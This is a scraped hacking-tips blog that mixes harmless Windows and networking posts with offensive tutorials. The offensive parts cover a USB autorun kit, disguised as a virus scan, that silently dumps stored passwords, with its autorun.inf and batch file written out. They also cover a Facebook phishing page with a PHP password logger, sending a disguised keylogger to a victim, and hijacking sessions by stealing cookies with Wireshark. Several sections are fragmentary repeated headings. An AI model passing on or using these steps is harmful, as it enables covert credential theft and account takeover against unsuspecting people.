Create Your Own Customized Run Commands

The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command

Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.

1. Right click on your Desktop and select New -> Shortcut.

2. You will see a “Create Shortcut” Dialog box as shown below

 3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.

4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.

5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.

6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.

In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.

To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual.
Now just type this short name in the Run dialog box to open the program!

Steganography

Steganography:-




How to Hide Data in Image, Audio & Video Files:
Ever wondered to know how to hide secret messages in images, audio and video files?
In steganography , it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it.
Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.

The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.

Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a secret content in other large files.
Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

There are many steganography tools available online but only a few are able to work flawlessly.

The zip file contains two versions of Encryptor: One for encrypting the text messages and the other for encrypting binary files. Encryptor_TXT can be used to hide text messages in other files such as an image or a sound file. Encryptor_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.

With Encryptor, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.

At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.

How to Use Encrptor?

Suppose you want to hide a text message inside a JPG file:

1. Place the JPG and the text file (.txt) in the same folder as that of Encryptor_TXT.exe

2. Run Encryptor_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.

3. Note down the secret decryption key.

Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Encrptor tool and use the secret decryption key.

Here are some Screenshots:


1 Encryptor_txt.exe




2 Encryptor_Bin.exe





Want to try first? Download Encryptor_TXT (to hide text files) FREE.




Want to Hide any file in any other file of any format?
Buy  Ultimate Encryptor_BIN for just 1 $ !! ( NO LIMITATIONS!!)

And send your Secret Messages & Files.

Firewall

If you have been using Internet on a regular basis or working in a large company and surf the Internet while you are at work, you must have surely come across the term firewall. You might have also heard of people saying “firewalls protect their computer from web attacks and hackers” or “a certain website has been blocked by firewall in their work place”. 

If you have ever wondered to know what exactly is this firewall and how it works, here we go. 

How Firewalls Work

Firewalls are basically a barrier between your computer (or a network) and the Internet (outside world).

A firewall can be simply compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly a firewall is a software program or a hardware device that filters the information (packets) coming through the Internet to your personal computer or a computer network.

Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers.  However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers. In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:

1. Packet Filtering: 

In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.

2. Stateful Inspection: 

This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:

1. IP addresses: 

In any case if an IP address outside the network is said to be unfavorable, then it is possible to set  filter to block all the traffic to and from that IP address. For example, if a cetain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2. Domain names: 

Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.

3. Ports/Protocols:  

Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.

4. Specific words or phrases: 

A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.

Hardware vs. Software Firewall

Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.

Why Firewall?

Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. 

The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. 

Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extent.

Test the Working of your Antivirus – EICAR Test

 

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? 

Well here is a quick and easy way to test your antivirus.

The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. 

This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. 

Here is a step-by-step procedure to test your antivirus.

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

EICAR Test code 

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

NOTE: Most antivirus will pop-out a warning message in the Step-1 itself

You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive.

Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. 

This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

Wireshark Cookie Dump:

Wireshark Cookie Dump:

Wireshark Cookie Dump:

Sniff Passwords Using USB Drive

 

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. 

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. 

There exists many tools for recovering these passswords from their stored places. 

Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 

Here is a step by step procedre to create the password sniffing toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive
OR
   Download it from below :
Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up.
(This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This works on Windows 2000, XP and Vista

NOTE: This procedure will only sniff the stored passwords (if any) on the Computer.

 
Countermeasures


Never save password anywhere.
Disable autorun.

Wireshark Cookie Dump:

Wireshark Cookie Dump:

What is SSL?

What is Secure Sockets Layer (SSL)?

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Msn, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.

Cryptography


If two users want to have a secure communication they can also use cryptography to accomplish it

For example:

TFDVSF=Encrypted Text

SECURE= Decrypted Text

Here, used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on.



So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data

Standard Communication VS Secure communication

Suppose there exists two communication parties A (client) and B (server)

Standard communication(HTTP)

When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.This scenario is illustrated using the following figure

Secure communication(HTTPS)

In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.This scenario is illustrated using the following figure

How is HTTPS implemented?

A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?

The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate

How to identify a Secure Connection?

In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

Gmail On Your Mobile

CHECK IF YOUR MOBILE SUPPORTS THIS SERVICE?

MOBILE SETTINGS


The setting for Gmail are as follows:

• Incoming Mail Server (POP3): pop.gmail.com on Port 995
• Outgoing Mail Server (SMTP): smtp.gmail.com on Port 587 (Note: Port 465 didn't seem to work)
• SMTP requires Authorization
• Both of these require SSL to be activated

Account Name: Gmail
SMTP Server: smtp.gmail.com
SMTP Port: 587 or 465
Secure Connection: ssl
Incoming Server: pop3
POP3 Server: pop.gmail.com
POP3 Port: 995 Secure Connection: ssl  
My Address: myemail@gmail.com  
Username: myemail@gmail.com
Password: mypassword
Use SMTP Authentication: Ticked  
Same as POP3 & IMAP4: Ticked

NOTE: You have to enable POP3 Access in your Gmail settings. There are instructions here if you are unsure how to do this

Login to your Gmail acc.
Click on Settings\ Forwarding & POP/IMAP
Enable POP Download & IMAP Access.

If you want to forward gmails to some other mail account, then add a forwarding address in FORWARDING.
You will receive a confirmation mail on other mail id.

About POP

POP, or Post Office Protocol, lets you download messages from Gmail's servers onto your computer so you can access your mail with a program like Microsoft Outlook Express or Thunderbird, even when you aren't connected to the Internet.

POP access is free for all Gmail users. However, if you're thinking about using POP - consider IMAP, which offers all the benefits listed above plus two-way communication between your web Gmail and your email client.
To learn more, visit these pages:

• What is IMAP, and what's the difference between IMAP and POP?
• How do I enable POP?
• How do I configure my mail client?

Lock Folder yourself without any folder locking software (XP SP3)

lock folder (XP SP3)
.. open notepad copy and paste the script below and save it .VBS extention
(visual basic script) .. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")oShellLink.TargetPath = "%windir%\system32\rundll32.exe"oShellLink.Arguments = "user32.dll,LockWorkStation"oShellLink.Save
first select a folder for example i'll use a folder name "software" in D drive D:\software\

In the same drive u create a text file in notepad and type

ren software software.{21EC2020-3AEA-1069-A2DD-08002B30309D}
and save it as loc.bat ( This file locks the folder when executed)
("software" is the name of the folder to be locked - change it to your folder's name- no space is allowed in folder name)


again u create a new file & type in a notepad as

ren software.{21EC2020-3AEA-1069-A2DD-08002B30309D} software
and save it as key.bat ( This file unlocks the folder when executed )

Now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and when u double click key the control panel will change to normal folder..
:)

Facebook Hacking

1) Phishing

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. You have to only get the trick used to make a phisher, which i think is very easy if You have knowledge of html & css...


Create an id in www.110mb.com,www.ripway.com, t35.com,yourfreehostingsite.com,000webhost.com.

These are the hosting site which will allow you to upload your files.


Download the fake Facebook page.html (index1.html) & write.php (write.php) file.
Upload it to your account.
Give that link of html page to the mail-picture-link (by any means fool him/her) of any person(acc you want to hack)

When a user types a Username Password in the the text box,The info is sent to "write.php" which acts as a password logger and redirects the page to "Real Facebook login" so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked

If anyone enters id & password ... it gets stored in passes.txt file in your account.

Now facebook shows (of phishing) that -if you have entered password at last page you need to reset password.
To avoid this you can change redirection to any other site eg: google.com.


NOTE:- PHISHING IS ILLEGAL

2) Keylogging

The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy


First of all free download Winspy keylogger software from link given below:
You can use Snipper Spy Or Keystroke Spy also...

Download Winspy Keylogger

After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.

Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.

Now, Winspy’s main screen will be displayed as shown in image below:

Select Remote at top, then Remote install.

On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.

.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.

After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.

3) Cookie Hijacking

Facebook Authentication Cookies

The cookie which Facebook uses to authenticate it's users is called "Datr".
If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account.
This is how a facebook authentication cookie looks like:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your Facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called 'firesheep' in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your Facebook account with wireshark.

Step 1 - First of all download wireshark from the official website and install it.

Step 2 - Next open up wireshark click on analyze and then click on interfaces.

Step 3 - Next choose the appropriate interface and click on start.

Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

 

Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.

Step 8 - Next you’ll want to open up firefox. You’ll need both Grease monkey and the cookieinjector script.
Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.


Countermeasures

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies.

ENJOY...!! :)

Wireshark Cookie Dump:

Background Pic setup ( FOR XP SP3)

Click here to Download setup file..... ( FOR XP SP3)

Alternate Link


Installation Password is "trushantpatel"

Math Magic

Click here to download....exe file